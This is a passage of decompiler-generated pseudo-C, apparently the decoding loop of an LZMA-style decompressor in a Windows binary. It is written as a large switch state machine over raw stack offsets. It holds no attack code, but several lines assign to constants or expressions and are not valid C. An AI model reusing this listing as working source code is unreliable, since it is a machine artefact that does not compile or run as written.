											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                                                                                                                                                                                                            0x00407194
